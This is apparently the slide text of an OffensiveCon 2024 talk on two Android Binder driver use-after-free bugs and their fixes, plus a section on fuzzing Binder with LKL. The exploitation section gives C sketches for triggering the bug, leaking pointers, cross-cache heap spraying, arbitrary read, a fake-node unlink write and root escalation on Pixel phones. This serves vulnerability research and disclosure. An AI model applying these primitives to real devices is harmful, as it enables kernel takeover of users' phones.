OffensiveCon 24: Binder
10-May-2024
Agenda
Who we are
What is Binder?
[Diagram: Binder architecture. Apps and system services (trusted or untrusted) perform RPC through libbinder (the Binder userspace library), which talks to the /dev/binder kernel driver. When Process A performs an RPC call such as MyService.myMethod(args) against Process B's MyService, Binder creates a Node for the service (2) and a Ref to that Node for the caller (3) before the RPC calls are performed (4).]
[Diagram: transaction buffer layout. The userspace command buffer (write_size = sizeof(write_buffer)) and a read_buffer are handed to the kernel; target.handle = 0 addresses the context manager. The transaction buffer embeds objects such as struct flat_binder_object and struct binder_fd_object, whose positions are recorded in a separate offsets array.]
● Transactions transfer Binder objects between the IPC peers:
○ Binder Node
○ Binder Ref
○ File descriptors (struct binder_fd_object)
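To make the layout concrete, here is a minimal userspace sketch of submitting one transaction that embeds a single Binder object through /dev/binder, using only the UAPI in linux/android/binder.h. The target handle, the 0x1337 identifiers, and the helper name send_node are illustrative; error handling is omitted, and offsets_size is a parameter so a later slide can reuse the helper.

#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <linux/android/binder.h>   /* UAPI: binder_write_read, BC_TRANSACTION, ... */

/* Sketch: send one BC_TRANSACTION whose buffer embeds a single Binder node. */
static int send_node(int binder_fd, uint32_t target_handle,
                     binder_size_t offsets_size)
{
    struct flat_binder_object obj = {
        .hdr.type = BINDER_TYPE_BINDER,   /* a Node; the receiver gets a Ref */
        .binder   = 0x1337,               /* userspace identifier of the node */
        .cookie   = 0x1337,
    };
    binder_size_t offsets[1] = { 0 };     /* obj sits at offset 0 of the buffer */

    struct binder_transaction_data tr = {
        .target.handle    = target_handle,      /* 0 = context manager */
        .data_size        = sizeof(obj),
        .offsets_size     = offsets_size,       /* normally sizeof(offsets) */
        .data.ptr.buffer  = (binder_uintptr_t)&obj,
        .data.ptr.offsets = (binder_uintptr_t)offsets,
    };

    /* write_buffer is a command stream: a u32 command followed by its payload */
    uint8_t wbuf[sizeof(uint32_t) + sizeof(tr)];
    *(uint32_t *)wbuf = BC_TRANSACTION;
    memcpy(wbuf + sizeof(uint32_t), &tr, sizeof(tr));

    struct binder_write_read bwr = {
        .write_size   = sizeof(wbuf),
        .write_buffer = (binder_uintptr_t)wbuf,
    };
    return ioctl(binder_fd, BINDER_WRITE_READ, &bwr);
}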
Vulnerability Description (1)
● When sending a transaction, Binder translates each embedded object into a form valid in the receiving process
○ Translate a Binder Node to a Binder Ref, or vice versa
○ Install new file descriptors in the receiving process for file sharing
binder_size_t buffer_offset = 0;
/* Reject transactions whose offsets array has a misaligned size.
 * Note: this check runs BEFORE the translation loop below. */
if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) {
    goto err_bad_offset;
}
/* Translate the object at each offset; on error inside the loop:
 * goto err_bad_offset */
for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
     buffer_offset += sizeof(binder_size_t)) {
    // ...
}
err_bad_offset:
    binder_transaction_buffer_release(target_proc, NULL, t->buffer,
                                      buffer_offset, /*is_failure*/true);
Vulnerability Description (2)
● If an error occurs inside the loop, Binder must clean up all objects translated so far
● The cleanup function is passed the buffer offset the loop has reached, with is_failure set to true
Vulnerability Description (3)
● What happens if an error happens before any objects are processed?
● buffer_offset is still 0, and binder_transaction_buffer_release() treats an offset of 0 with is_failure == true as "release every object in the buffer"
● The cleanup therefore parses the sender's untranslated objects as if they had already been translated, decrementing node reference counters that were never incremented
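A hedged sketch of reaching that path with the send_node() helper from earlier: the only change from a well-formed transaction is an offsets_size value that fails the alignment check.

/* Hypothetical trigger: 7 is not a multiple of sizeof(binder_size_t) == 8,
 * so binder_transaction() jumps to err_bad_offset with buffer_offset == 0
 * before translating the embedded object. */
static int trigger_error_path(int binder_fd, uint32_t target_handle)
{
    return send_node(binder_fd, target_handle, sizeof(binder_size_t) - 1);
}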
Vulnerability Description (4)
[Flowchart: binder_transaction. Validate transaction; if False, take the error path. If True, Translate Ref to Node (side-effect: increment the Node's reference counters), then Finish binder_transaction.]
Vulnerability Explained (Initial State)
[Sequence diagram: Thread A, /dev/binder (kernel), Thread B.
1. Thread B sends a transaction addressed to Thread A's Node via ioctl; the kernel translates Thread B's Ref (0xbeef) and queues a Pending Transaction for Thread A.
2. Thread B sends a Node instead of a Ref, with an unaligned offsets_size; the kernel takes the error path and "rolls back" a translation that never happened, dropping the Node's refcount from 1 to 0.
3. Thread B is killed. The MyService Node (0xbeef) is freed, yet Thread A's state still holds a Pending Transaction pointing to it.]
Vulnerability Explained (Attacker Workflow)
[Diagram: Thread A and /dev/binder (kernel). Thread A's state still contains a Pending Transaction referencing the MyService Node (0xbeef), whose refcount has dropped from 1 to 0 and whose memory has been freed: a dangling node the attacker can now reclaim.]
CVE-2023-20938 Remediation
[Flowchart: patched binder_transaction. Translate Ref to Node; on failure, "untranslate" each already-translated object and roll back its state, looping while more objects remain, then finish binder_transaction. The error path now only undoes translations that actually happened.]
Discovery of CVE-2023-21255
● The fuzzer identified another test case triggering the same UAF issue
○ Send a valid transaction with a binder node to pollute the binder kernel buffer
○ Send the malformed transaction with misaligned offsets to trigger the error path
■ binder_transaction_buffer_release would roll back the binder node translation from the previous step (the recycled kernel buffer still holds its stale objects) => UAF
[1] https://source.android.com/docs/security/bulletin/2023-07-01#kernel
Exploitation
Exploitation Steps
[1] https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/
Leak Primitive
static int binder_thread_read(...)
{
    struct binder_transaction_data_secctx tr;
    struct binder_transaction_data *trd = &tr.transaction_data;
    ...
    trd->target.ptr = target_node->ptr;   // [1] read through the node pointer
    trd->cookie = target_node->cookie;    // [1]
    ...
    if (copy_to_user(ptr, &tr, trsize)) { // [2] copied out to userspace
[Diagram: struct binder_node has uintptr_t ptr at offset 88 and uintptr_t cookie at offset 96 (both 0x1337 here). binder_thread_read() copies them from the node, even a dangling one, into trd.target.ptr and trd.cookie, which cross the kernel/userspace boundary with the transaction addressed "To: Thread A".]
Leak Primitive
1. Exploit the vulnerability to free a binder_node
2. Allocate a kernel object at the same memory location
3. Leak values of the new kernel object (at offsets 88 and 96)
[Diagram: kernel address space. A struct epitem is allocated from the same memory as the freed struct binder_node (the dangling pointer "To: Thread A" still aims at it). The epitem's struct list_head, with *next at offset 88 and *prev at offset 96, overlays the node's uintptr_t ptr and uintptr_t cookie fields, so trd.target.ptr and trd.cookie now leak the two list pointers.]
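A sketch of the receiving side of the leak under the assumptions above: the pending transaction is consumed via BINDER_WRITE_READ and the two fields binder_thread_read() filled from the dangling node are read back from binder_transaction_data. Parsing only the first returned command is a simplification (a real reader also handles BR_NOOP and, with security contexts, BR_TRANSACTION_SEC_CTX).

#include <stdint.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <linux/android/binder.h>

/* Sketch: consume the pending BR_TRANSACTION and read the leaked values.
 * After the overlay, target.ptr/cookie hold the epitem's next/prev pointers. */
static void read_leak(int binder_fd)
{
    uint8_t rbuf[256] = { 0 };
    struct binder_write_read bwr = {
        .read_size   = sizeof(rbuf),
        .read_buffer = (binder_uintptr_t)rbuf,
    };
    ioctl(binder_fd, BINDER_WRITE_READ, &bwr);

    uint32_t cmd = *(uint32_t *)rbuf;              /* simplification: first cmd */
    if (cmd == BR_TRANSACTION) {
        struct binder_transaction_data *tr =
            (struct binder_transaction_data *)(rbuf + sizeof(uint32_t));
        printf("leaked next: 0x%llx\n", (unsigned long long)tr->target.ptr);
        printf("leaked prev: 0x%llx\n", (unsigned long long)tr->cookie);
    }
}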
Leak Primitive
How can we overlay another kernel object (epitem) onto the freed binder_node?
● Much easier in userspace (e.g. glibc)
○ malloc uses the same freelist regardless of object types
● Linux Kernel is more complicated: SLUB allocator
○ Different object types can be allocated from different caches
● Many mitigations enabled in recent years
○ CONFIG_SLAB_FREELIST_HARDENED
○ CONFIG_SLAB_FREELIST_RANDOM
○ GFP_KERNEL_ACCOUNT*
○ No more cache aliasing for `epitem` (SLAB_ACCOUNT)
○ No unprivileged userfaultfd (for heap spraying)
* Removed in 5.9 and added back in 5.14 (we’re targeting 5.10)
Cross-cache Attack (SLUB Allocator)
[Animated diagram: the Page Allocator (Buddy Allocator), with its Per-CPU Page Cache, hands pages of physical memory to the SLUB allocator. Each kmem_cache (here kmalloc-128 and eventpoll_epi) has a per-CPU kmem_cache_cpu with an Active Slab plus Partial Slabs, and objects are allocated from and freed back into those slabs.]
● struct binder_node is allocated from the generic kmalloc-128 cache, while struct epitem comes from the dedicated eventpoll_epi cache, so the freed node cannot simply be reallocated as an epitem within one cache
● Spray and free 1000+ binder_nodes so that every object in the dangling node's slab is free; the empty slab page is returned through the per-CPU page cache to the page allocator
● Allocate many epitems: the eventpoll_epi cache requests fresh pages and can be handed the very page that used to back the dangling binder_node
https://youtu.be/VJWEUsTDtuc
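A sketch of the reclaim side: each EPOLL_CTL_ADD allocates one struct epitem from the eventpoll_epi cache, and a given fd can only be added once per epoll instance, so the spray uses many epoll fds. The spray size and watched fd are illustrative.

#include <sys/epoll.h>

#define NUM_EPFDS 1024   /* illustrative spray size */

/* Sketch: allocate many struct epitem objects so eventpoll_epi pulls fresh
 * pages from the page allocator -- ideally the page that previously backed
 * the slab of the dangling binder_node. Keep the epoll fds open so the
 * epitems stay alive. */
static void spray_epitems(int watched_fd)
{
    struct epoll_event ev = {
        .events   = EPOLLIN,
        .data.u64 = 0x4141414141414141ULL,   /* attacker-chosen epitem data */
    };
    for (int i = 0; i < NUM_EPFDS; i++) {
        int epfd = epoll_create1(0);
        epoll_ctl(epfd, EPOLL_CTL_ADD, watched_fd, &ev);  /* one epitem each */
    }
}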
Arbitrary Read
Use the Leak Primitive to leak a pointer to a struct file
[Diagram: epitems watching the same file are chained through their list_head fields (*next at offset 88, *prev at offset 96); the leaked next/prev pointers therefore lead to neighboring epitems and, at the ends of the chain, into the struct file's f_ep_links list head.]
Arbitrary Read
ioctl(fd, FIGETBSZ, &value); // &value == argp
[Diagram: the FIGETBSZ handler walks struct file -> struct inode (i_sb) -> struct super_block (s_blocksize) and copies s_blocksize out to argp; the annotations mark the field offsets along the chain (40, 40 and 24 bytes) and the struct file's f_ep_links.next/prev. The epitem's event.data field can be modified directly with the epoll_ctl() syscall, which is what lets the exploit steer this pointer chain.]
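FIGETBSZ itself is an ordinary ioctl from linux/fs.h. A minimal sketch of the benign call, with a comment marking the kernel dereference chain the exploit redirects (the read32 helper name is ours):

#include <sys/ioctl.h>
#include <linux/fs.h>    /* FIGETBSZ */

/* Sketch: in the kernel, FIGETBSZ performs roughly
 *     put_user(file_inode(filp)->i_sb->s_blocksize, (int __user *)argp);
 * Normally `value` is the filesystem block size. With the inode/super_block
 * pointers redirected into controlled memory, each call instead reads
 * 4 bytes from an attacker-chosen kernel address. */
static int read32(int fd)
{
    int value = 0;
    ioctl(fd, FIGETBSZ, &value);   /* &value == argp */
    return value;
}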
Unlink primitive
1. Exploit the vulnerability to create a dangling Node.
2. Allocate a fake binder_node with the sendmsg() syscall (heap spray).
[Diagram: the dangling pointer now points at a fake binder_node, a kernel object allocated with data we control via heap spray, including its ptr and cookie fields.]
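A hedged sketch of the sendmsg() spray: the kernel copies msg_control into a kmalloc'd buffer of caller-chosen size and content (here 128 bytes, the binder_node size class), letting us plant fake ptr/cookie values at offsets 88/96. The allocation normally lives only for the duration of the call, so in practice the send is arranged to block (for example, against a full socket buffer) while the use-after-free is exercised; the helper name and all concrete values are illustrative.

#include <stdint.h>
#include <string.h>
#include <sys/socket.h>

/* Sketch: spray a fake binder_node over the freed slot via sendmsg()'s
 * control-message buffer (copied into a kmalloc-128 allocation). */
static void spray_fake_node(int sock_fd, uint64_t fake_ptr, uint64_t fake_cookie)
{
    char cbuf[128] = { 0 };
    struct cmsghdr *cmsg = (struct cmsghdr *)cbuf;
    cmsg->cmsg_len = sizeof(cbuf);           /* consume the whole buffer */
    memcpy(cbuf + 88, &fake_ptr, 8);         /* fake node->ptr    (offset 88) */
    memcpy(cbuf + 96, &fake_cookie, 8);      /* fake node->cookie (offset 96) */

    char byte = 'A';
    struct iovec iov = { .iov_base = &byte, .iov_len = 1 };
    struct msghdr msg = {
        .msg_iov        = &iov,
        .msg_iovlen     = 1,
        .msg_control    = cbuf,              /* copied into kernel kmalloc */
        .msg_controllen = sizeof(cbuf),      /* controls allocation size  */
    };
    sendmsg(sock_fd, &msg, 0);
}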
Unlink primitive
● Use-after-free when decrementing the refcount of the (now fake) binder_node
● The decrement removes the node from kernel linked lists whose next/prev pointers we control, yielding a constrained arbitrary write
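The write gadget behind the primitive is the kernel's ordinary doubly-linked-list removal. A conceptual sketch of its semantics (which list the node is removed from depends on its state, so this is the generic shape, not Binder-specific code):

/* Conceptual sketch: unlinking a list node writes each neighbor pointer
 * into the other. With next/prev under attacker control (via the fake
 * binder_node), both stores become attacker-chosen writes. */
struct list_head { struct list_head *next, *prev; };

static void __list_del(struct list_head *prev, struct list_head *next)
{
    next->prev = prev;   /* write `prev` to *(next + 8) */
    prev->next = next;   /* write `next` to *(prev + 0) */
}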
Root Privilege Escalation
Video demonstration of the full exploit on Pixel 6 Pro & Pixel 7 Pro:
https://youtu.be/7qFb6RUHnnU
Fuzzing Binder
with Linux Kernel Library (LKL)
Binder Fuzzing
Challenges of fuzzing Binder:
● Binder commands
● Scatter-gather data structures: chains of struct binder_buffer_object copied into kernel space
● Data dependencies between them
[1] https://github.com/lkl/linux
[2] Xu et al., Fuzzing File Systems via Two-Dimensional Input Space Exploration. IEEE S&P (2019).
[3] https://github.com/atrosinenko/kbdysch
Anatomy of LKL fuzzer
LKL enables fuzzing Linux kernel code in user-space
● Use an in-process fuzzing engine, such as libFuzzer
[Diagram: a GNU/Linux x86_64 user-space process hosts the Linux kernel + KASan together with a libFuzzer-based Binder fuzzing harness; libFuzzer supplies the fuzz data and provides coverage feedback & crash detection, all running on top of the host kernel (Linux, Android, Windows).]
Advantages
● High fuzzing performance on x86_64
● Ease of custom modifications
○ e.g. mocking hardware, custom device driver, scheduler
Limitations
● No SMP in LKL
● x86_64 vs aarch64 -- potential false positives, false negatives
Using LKL from your C program
int ret = lkl_start_kernel(&lkl_host_ops, "mem=50M");
lkl_mount_fs("sysfs");
lkl_mount_fs("proc");
lkl_mount_fs("dev");
...
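Once the kernel is booted and the filesystems mounted, the harness drives the target through LKL's lkl_sys_* syscall wrappers. A minimal sketch, assuming those generated wrappers; how the fuzzer's bytes are decoded into well-formed Binder commands is the harness's job and is not shown:

#include <stddef.h>
#include <stdint.h>
#include <lkl.h>
#include <linux/android/binder.h>   /* for the BINDER_WRITE_READ ioctl number */

/* Sketch: one fuzz iteration -- open the in-LKL binder device and feed it a
 * fuzzer-derived command stream, just like a real userspace client would. */
static void fuzz_one_input(const uint8_t *data, size_t size)
{
    int fd = lkl_sys_open("/dev/binder", LKL_O_RDWR, 0);
    if (fd < 0)
        return;

    struct binder_write_read bwr = {
        .write_size   = size,
        .write_buffer = (binder_uintptr_t)data,
    };
    lkl_sys_ioctl(fd, BINDER_WRITE_READ, (long)&bwr);
    lkl_sys_close(fd);
}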
Deterministically simulate thread interleaving based on fuzz data [1]
● Hook synchronization points such as mutex_lock and mutex_unlock
[Diagram: two threads alternating lock / unlock / yield / schedule, with each yield decision taken from the fuzz input.]
[1] Williamson, N., Catch Me If You Can: Deterministic Discovery of Race Conditions with Fuzzing. Black Hat USA (2022).
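A conceptual sketch of the idea from [1] (not LKL's actual hook API): each instrumented lock site consumes one bit of dedicated fuzz data to decide whether to yield first, so the interleaving is a pure function of the input and any race found replays deterministically.

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Conceptual sketch: fuzz-data-driven scheduling decisions. */
static const uint8_t *sched_bits;   /* slice of the fuzz input */
static size_t sched_nbits, sched_pos;

static bool yield_here(void)
{
    if (sched_pos >= sched_nbits)
        return false;                       /* out of data: never yield */
    bool bit = (sched_bits[sched_pos / 8] >> (sched_pos % 8)) & 1;
    sched_pos++;
    return bit;
}

/* Wrap the kernel's lock acquisition: optionally let another thread run
 * before taking the lock, exploring a different interleaving per input. */
static void hooked_mutex_lock(void (*real_lock)(void *), void *mutex,
                              void (*yield)(void))
{
    if (yield_here())
        yield();
    real_lock(mutex);
}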
Results